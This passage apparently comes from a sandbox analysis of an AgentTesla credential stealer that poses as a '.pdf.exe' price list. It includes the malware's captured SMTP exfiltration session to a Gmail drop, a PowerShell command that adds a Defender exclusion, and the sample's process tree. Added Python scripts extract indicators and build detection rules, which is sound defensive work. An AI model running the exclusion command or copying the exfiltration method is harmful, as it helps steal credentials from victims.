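S: 250-gator4156.hostgator.com Hello 675052 [8.46.123.33]
S: 250-SIZE 52428800
S: 250-8BITMIME
S: 250-PIPELINING
S: 250-PIPECONNECT
S: 250-AUTH PLAIN LOGIN
S: 250-STARTTLS
S: 250 HELP
C: AUTH login dmljdG9yaWFAbXVzYWJvZHkuY29t
S: 334 UGFzc3dvcmQ6
S: 235 Authentication succeeded
C: MAIL FROM:<victoria@musabody.com>
S: 250 OK
C: RCPT TO:<pritchardchristopher281@gmail.com>
S: 250 Accepted
C: DATA
S: 354 Enter message, ending with "." on a line by itself
C: .
S: 250 OK id=1stkjn-0028iQ-27
C: QUIT
S: 221 gator4156.hostgator.com closing connection
"""


def b64_text(token: str) -> str:
    """Decode a base64 SMTP token to text; return the token unchanged if it is not base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return token


def angle_address(arg: str) -> str:
    """'FROM:<a@b>' -> 'a@b'; falls back to the bare text after the colon."""
    _, _, rest = arg.partition(":")
    rest = rest.strip()
    return rest[1:-1] if rest.startswith("<") and rest.endswith(">") else rest


def triage_smtp(transcript: str) -> dict:
    """Extract relay, credentials, sender, recipients and TLS use from a C:/S: transcript."""
    iocs = {
        "server_banner": None, "ehlo_name": None,
        "auth_mechanism": None, "auth_user": None, "auth_password": None,
        "authenticated": False, "starttls_offered": False, "starttls_used": False,
        "mail_from": None, "rcpt_to": [], "queue_id": None,
    }
    pending = None  # field the next client line fills after a 334 challenge, or None
    for line in transcript.splitlines():
        who, _, text = line.partition(": ")
        if who == "S":
            code, rest = text[:3], text[4:]  # reply code, then text after the ' ' or '-'
            pending = None                   # any reply other than 334 ends a challenge
            if code == "220" and iocs["server_banner"] is None:
                iocs["server_banner"] = rest
            elif code == "250" and rest.upper() == "STARTTLS":
                iocs["starttls_offered"] = True
            elif code == "250" and rest.startswith("OK id="):
                iocs["queue_id"] = rest[len("OK id="):]
            elif code == "334":
                # AUTH LOGIN challenges are base64 "Username:" / "Password:"
                pending = "auth_password" if "password" in b64_text(rest).lower() else "auth_user"
            elif code == "235":
                iocs["authenticated"] = True
        elif who == "C":
            if pending:  # the client's answer to the last 334 challenge
                iocs[pending] = b64_text(text.strip())
                pending = None
                continue
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb in ("EHLO", "HELO"):
                iocs["ehlo_name"] = arg.strip()
            elif verb == "STARTTLS":
                iocs["starttls_used"] = True
            elif verb == "AUTH":
                mech, _, initial = arg.partition(" ")
                iocs["auth_mechanism"] = mech.upper()
                if mech.upper() == "LOGIN" and initial:  # username sent as initial response
                    iocs["auth_user"] = b64_text(initial.strip())
            elif verb == "MAIL":
                iocs["mail_from"] = angle_address(arg)
            elif verb == "RCPT":
                iocs["rcpt_to"].append(angle_address(arg))
    return iocs


if __name__ == "__main__":
    for key, value in triage_smtp(TRANSCRIPT).items():
        print(f"{key:>17}: {value}")
```

On this transcript the result has auth_user and mail_from both equal to victoria@musabody.com, rcpt_to equal to the Gmail drop, starttls_offered true with starttls_used false, and auth_password None because the capture omits that line. The same function applied to a full pcap-derived transcript where the password reply is present will populate auth_password, which is the value to rotate first.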
                                          Target ID:0
                                          Start time:05:22:58
                                          Start date:26/09/2024
                                          Path:C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
                                          Imagebase:0xfc0000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:05:22:59
                                          Start date:26/09/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
                                          Imagebase:0x240000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:05:22:59
                                          Start date:26/09/2024
                                          Path:C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
                                          Imagebase:0x6b0000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Target ID:4
                                          Start time:05:22:59
                                          Start date:26/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:05:23:11
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xc40000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 29%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          Target ID:6
                                          Start time:05:23:12
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0x80000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:7
                                          Start time:05:23:12
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0x230000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:8
                                          Start time:05:23:12
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xdc0000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1894805275.0000000003171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:10
                                          Start time:05:23:19
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0x7e0000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:11
                                          Start time:05:23:20
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xac0000
                                          File size:644'608 bytes
                                          MD5 hash:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4141088444.0000000002F2B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false
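The process list above reads straight into detection rules: a ".pdf.exe" double extension on the initial file, a PowerShell "Add-MpPreference -ExclusionPath" for the sample's own path issued while it still has administrator rights, and the same MD5 (5B35E1E6CDF0D5277FA8DCCD5FC06D26) re-executed from %AppData%\Roaming\ctsdvwT\ as a non-elevated process. The script below is an added example, not Joe Sandbox code; PROCESSES is a constructed, abbreviated copy of four of the entries above (id, path, command line, MD5, elevation), and the rule names and regular expressions are mine.

```python
"""Detection rules derived from the sandbox process list.

Added example, not Joe Sandbox code. PROCESSES is a constructed, abbreviated
copy of the process entries in the report (id, image path, command line, MD5,
elevation); the rule names and regular expressions are the author's own.
"""
import re

INITIAL_MD5 = "5B35E1E6CDF0D5277FA8DCCD5FC06D26"  # MD5 of the submitted sample

# Constructed from the report's process entries (Target IDs 0, 2, 4 and 5).
PROCESSES = [
    {"id": 0,
     "path": r"C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe",
     "cmdline": r'"C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"',
     "md5": INITIAL_MD5, "elevated": True},
    {"id": 2,
     "path": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"',
     "md5": "C32CA4ACFCC635EC1EA6ED8A34DF5FAC", "elevated": True},
    {"id": 4,
     "path": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "md5": "0D698AF330FD17BEE3BF90011D49251D", "elevated": True},
    {"id": 5,
     "path": r"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"',
     "md5": INITIAL_MD5, "elevated": False},
]

# Lure name: a document extension immediately followed by an executable one.
DOUBLE_EXTENSION = re.compile(
    r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.(exe|scr|com|pif|bat|cmd)$", re.I)
# Defender exclusion added from a command line (-ExclusionPath, -ExclusionProcess, -ExclusionExtension).
DEFENDER_EXCLUSION = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+[\"']?([^\"']+)", re.I)


def detect(processes, initial_md5=INITIAL_MD5):
    """Return (process id, rule, detail) triples for every rule that fires."""
    findings = []
    for p in processes:
        image = p["path"].rsplit("\\", 1)[-1]
        if DOUBLE_EXTENSION.search(image):
            findings.append((p["id"], "masquerading.double_extension", image))
        m = DEFENDER_EXCLUSION.search(p["cmdline"])
        if m:
            findings.append((p["id"], "defense_evasion.defender_exclusion",
                             f"{m.group(1)}={m.group(2).strip()}"))
        # The submitted file's own bytes, relaunched from a user-writable profile directory.
        if "\\appdata\\roaming\\" in p["path"].lower() and p["md5"].upper() == initial_md5.upper():
            findings.append((p["id"], "execution.initial_sample_rerun_from_appdata", p["path"]))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in detect(PROCESSES):
        print(f"target {pid}: {rule}: {detail}")
```

The exclusion rule is the one to deploy first: Add-MpPreference with any -Exclusion* parameter on a process-creation event is rare in normal administration and, as here, usually names the very binary that is about to unpack. The AppData rule needs the hash of the original lure as input, so it is an enrichment for an investigation rather than a standing alert.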

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:7.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:88
                                            Total number of Limit Nodes:11
                                            execution_graph 36029 30fd01c 36030 30fd034 36029->36030 36031 30fd08e 36030->36031 36034 58f2c08 36030->36034 36042 58f1434 36030->36042 36036 58f2c18 36034->36036 36035 58f2c79 36060 58f155c 36035->36060 36036->36035 36038 58f2c69 36036->36038 36050 58f2d93 36038->36050 36055 58f2da0 36038->36055 36039 58f2c77 36043 58f143f 36042->36043 36044 58f2c79 36043->36044 36046 58f2c69 36043->36046 36045 58f155c CallWindowProcW 36044->36045 36047 58f2c77 36045->36047 36048 58f2d93 CallWindowProcW 36046->36048 36049 58f2da0 CallWindowProcW 36046->36049 36048->36047 36049->36047 36052 58f2da0 36050->36052 36051 58f2e40 36051->36039 36064 58f2e48 36052->36064 36068 58f2e58 36052->36068 36057 58f2db4 36055->36057 36056 58f2e40 36056->36039 36058 58f2e48 CallWindowProcW 36057->36058 36059 58f2e58 CallWindowProcW 36057->36059 36058->36056 36059->36056 36061 58f1567 36060->36061 36062 58f435a CallWindowProcW 36061->36062 36063 58f4309 36061->36063 36062->36063 36063->36039 36065 58f2e58 36064->36065 36066 58f2e69 36065->36066 36071 58f4292 36065->36071 36066->36051 36069 58f2e69 36068->36069 36070 58f4292 CallWindowProcW 36068->36070 36069->36051 36070->36069 36072 58f155c CallWindowProcW 36071->36072 36073 58f42aa 36072->36073 36073->36066 35993 324d340 35994 324d386 35993->35994 35998 324d520 35994->35998 36001 324d50f 35994->36001 35995 324d473 36005 324d0b8 35998->36005 36002 324d520 36001->36002 36003 324d0b8 DuplicateHandle 36002->36003 36004 324d54e 36003->36004 36004->35995 36006 324d588 DuplicateHandle 36005->36006 36007 324d54e 36006->36007 36007->35995 36074 324afb0 36075 324afbf 36074->36075 36078 324b097 36074->36078 36083 324b0a8 36074->36083 36079 324b0dc 36078->36079 36080 324b0b9 36078->36080 36079->36075 36080->36079 36081 324b2e0 GetModuleHandleW 36080->36081 36082 324b30d 36081->36082 36082->36075 36084 324b0b9 36083->36084 36085 324b0dc 36083->36085 36084->36085 36086 324b2e0 GetModuleHandleW 36084->36086 
36085->36075 36087 324b30d 36086->36087 36087->36075 36088 7981e80 36089 798200b 36088->36089 36090 7981ea6 36088->36090 36090->36089 36094 79820f8 36090->36094 36098 7982192 36090->36098 36103 7982100 PostMessageW 36090->36103 36095 79820fb PostMessageW 36094->36095 36097 7982092 36094->36097 36096 798216c 36095->36096 36096->36090 36097->36090 36099 798212e PostMessageW 36098->36099 36102 7982197 36098->36102 36101 798216c 36099->36101 36101->36090 36102->36090 36104 798216c 36103->36104 36104->36090 36008 3244668 36009 324467a 36008->36009 36010 3244686 36009->36010 36012 3244779 36009->36012 36013 324479d 36012->36013 36017 3244879 36013->36017 36021 3244888 36013->36021 36018 3244888 36017->36018 36019 324498c 36018->36019 36025 32444b4 36018->36025 36023 32448af 36021->36023 36022 324498c 36022->36022 36023->36022 36024 32444b4 CreateActCtxA 36023->36024 36024->36022 36026 3245918 CreateActCtxA 36025->36026 36028 32459db 36026->36028

                                            Control-flow Graph
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1707324695.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58f0000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Pp^q
                                            • API String ID: 0-3179448734
                                            • Opcode ID: 0b43d9e8dee3b06c17b0cd0b089fb52744d7c5c572271cb241c6e62345d0ed4a
                                            • Instruction ID: 6d95be1ac7bade924826c6f8de282069731617563251ec89e659dab9f0b6368c
                                            • Opcode Fuzzy Hash: 0b43d9e8dee3b06c17b0cd0b089fb52744d7c5c572271cb241c6e62345d0ed4a
                                            • Instruction Fuzzy Hash: 3B23D734A10219CFDB19DF68C898AD9B7B5FF89300F5141E9E909AB361DB31AE85CF41

                                            Control-flow Graph
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1707324695.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58f0000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Pp^q
                                            • API String ID: 0-3179448734
                                            • Opcode ID: 8b9fb48110adbb7edaef220f854f284c8d3f00781b3f19d323cf7db6a0af5e4b
                                            • Instruction ID: 8b6bd6d81f31c8b8ecc40c88283f9c4ab24297d57d74f4f91cd0688887272568
                                            • Opcode Fuzzy Hash: 8b9fb48110adbb7edaef220f854f284c8d3f00781b3f19d323cf7db6a0af5e4b
                                            • Instruction Fuzzy Hash: E923C734A10219CFDB19DF68C898AD9B7B5FF89300F5141E9E909AB361DB71AE85CF40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1708887931.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e2d714f485b02126425c8b07d026b16e60192da3bd8d71f653919ed4164e308
                                            • Instruction ID: 5cdd0aab2c7ce0b50e6256099538030451a67243c7e1480d0577a8b194cbf0fc
                                            • Opcode Fuzzy Hash: 4e2d714f485b02126425c8b07d026b16e60192da3bd8d71f653919ed4164e308
                                            • Instruction Fuzzy Hash: C0D05B74E5E044CFC781BF7499545F4B9BCAF57244F0828D9554A97343E6B445018B19

                                            Control-flow Graph
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0324B2FE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 58db11759268a39646d93506c6b00d58c1e536fb2fe293995c9284677e419d5e
                                            • Instruction ID: 0bb9cdd7092e0afa2e81293e9026bb4364482a989c7d7fa47a72995ce0cba8a0
                                            • Opcode Fuzzy Hash: 58db11759268a39646d93506c6b00d58c1e536fb2fe293995c9284677e419d5e
                                            • Instruction Fuzzy Hash: 7A711370A10B068FD728DF2AD44579ABBF5FF88704F048A29D48A9BA50D775E885CB90

                                            Control-flow Graph
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 058F4381
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1707324695.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58f0000_26.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 8543bab832316300d3bae9b02269fa27a3ee039f4e38a6eee0e59765fca5143e
                                            • Instruction ID: 7f92cb07463a60b9164685e17f82689bc0adfe8f1e93718bbd660fb7d667cd10
                                            • Opcode Fuzzy Hash: 8543bab832316300d3bae9b02269fa27a3ee039f4e38a6eee0e59765fca5143e
                                            • Instruction Fuzzy Hash: 0341EAB5900309DFCB14CF99C448AAABBF5FB88314F14C459EA19AB321D775A845CBA0

                                            Control-flow Graph
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 032459C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 48f67c21cca681ad72303cc7c9866318dd1731385debcfcfaa605ba39e57066f
                                            • Instruction ID: fd6a9702245dabe1f922fa87b3f70da71ea6bffb15b7639263e2ed9c3c678de8
                                            • Opcode Fuzzy Hash: 48f67c21cca681ad72303cc7c9866318dd1731385debcfcfaa605ba39e57066f
                                            • Instruction Fuzzy Hash: C041D2B1C1061DCBDB24CFA9C88469EBBF5BF49304F24806AD448AB255DB756985CF90

                                            Control-flow Graph
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 032459C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: d8a87140790455707ba006cda58e4750727c95ffdf98041612037e6048dd352a
                                            • Instruction ID: 4b25dcfb20390f8a523bdfcb495ce381fd3ac37355917ac63f34faa3611dbb11
                                            • Opcode Fuzzy Hash: d8a87140790455707ba006cda58e4750727c95ffdf98041612037e6048dd352a
                                            • Instruction Fuzzy Hash: 2941D1B1C00719CFDB24CFA9C884BDEBBB5BF49304F24816AD448AB255DB756986CF90

                                            Control-flow Graph
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0798215D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1708887931.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_26.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 07ef2acc554f3fe41d61801ba9bcd827bf4b94d82dc8cd53d7ebf16dc8bb8f89
                                            • Instruction ID: 7fbab7333d1efd3a918cae5f721cff4f48fa2f313793ef300ae0570f95988123
                                            • Opcode Fuzzy Hash: 07ef2acc554f3fe41d61801ba9bcd827bf4b94d82dc8cd53d7ebf16dc8bb8f89
                                            • Instruction Fuzzy Hash: 3731DFB6E042698EDF11EFA8D8047EEBFF4FF89315F14805AD904A7281C7385944CBA0

                                            Control-flow Graph
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0798215D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1708887931.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_26.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 1f17ac2256232016fc46a5b5af18eac2b9e796d46c534dff171c301d2d999085
                                            • Instruction ID: d23361f0114226c7f0302925417065213ede4dfa57a34ed5f0c9ecf0eb913902
                                            • Opcode Fuzzy Hash: 1f17ac2256232016fc46a5b5af18eac2b9e796d46c534dff171c301d2d999085
                                            • Instruction Fuzzy Hash: 343102B5800309DFDB10DF99D885BDEBBF8FB48324F20841AE558A7250C379A584CFA1

                                            Control-flow Graph
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0324D54E,?,?,?,?,?), ref: 0324D60F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 5bf8f53d8570fe091da89c63b22c3ae186248444f05fb027e455280e2f570ad4
                                            • Instruction ID: 88d3ac9bbd85b7b00ca49d081148b56562203a66ad74d36ae8d519ebdca86097
                                            • Opcode Fuzzy Hash: 5bf8f53d8570fe091da89c63b22c3ae186248444f05fb027e455280e2f570ad4
                                            • Instruction Fuzzy Hash: 902114B5900208EFDB10CF9AD984ADEFFF8EB48310F14841AE918A7311D378A954CFA4

                                            Control-flow Graph
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0324D54E,?,?,?,?,?), ref: 0324D60F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 11fbaf578117c3a2333e8f12a3cb140e52ab6a9d6338fc9e56316ed4858b0795
                                            • Instruction ID: 8be9646ffac1ae1964284d8870e41964e890a973faddd2960df98e326af4f36e
                                            • Opcode Fuzzy Hash: 11fbaf578117c3a2333e8f12a3cb140e52ab6a9d6338fc9e56316ed4858b0795
                                            • Instruction Fuzzy Hash: 7521E2B5D00209DFDB10CFA9D584AEEBBF5FB08310F14841AE918A7311D378A950CFA5

                                            Control-flow Graph
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0324B2FE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704923028.0000000003240000.00000040.00000800.00020000.00000000.sdmp, Offset: 03240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3240000_26.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: bbf9436f41eefcbcb11b733557f0b73d8ac77720383ecbcb47d14d929884b2ed
                                            • Instruction ID: cc12be9522ff611afa96ab73f4923ea4e70e348b9e26a9c772a548f0779f6e3f
                                            • Opcode Fuzzy Hash: bbf9436f41eefcbcb11b733557f0b73d8ac77720383ecbcb47d14d929884b2ed
                                            • Instruction Fuzzy Hash: 1511E0B5C003498FCB14CF9AC444ADEFBF8EF88324F14842AD459A7610D379A585CFA5

                                            Control-flow Graph
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0798215D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1708887931.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_26.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 3a26b8eec562229c6fe21ef0244d46d94708714d155ba337f5362024e015c1ec
                                            • Instruction ID: 5c24db5624ae365a4da2750add0f86d67d9d65319fe79fcd893cdb882e92ecf3
                                            • Opcode Fuzzy Hash: 3a26b8eec562229c6fe21ef0244d46d94708714d155ba337f5362024e015c1ec
                                            • Instruction Fuzzy Hash: 5E1100B5800349DFCB10DF9AC984BDEBBF8FB48324F20841AE558A7210C375A984CFA5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704069186.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_163d000_26.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61272a47945e978694d6164128af4e761b93aa7210a4a24bcf45031ea6ac9007
                                            • Instruction ID: 9e1e9b49ec9e0f1d1755e808a3792cd77d25d49c4bb813dd2fcfd7d313b7f9b7
                                            • Opcode Fuzzy Hash: 61272a47945e978694d6164128af4e761b93aa7210a4a24bcf45031ea6ac9007
                                            • Instruction Fuzzy Hash: 9621D371504240DFDB05DF58D9C0B2ABF65FBC8328F64C569E9094B296C336D456CAA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1704560757.00000000030FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030FD000, based on PE: false
                                            Joe Sandbox IDA Plugin
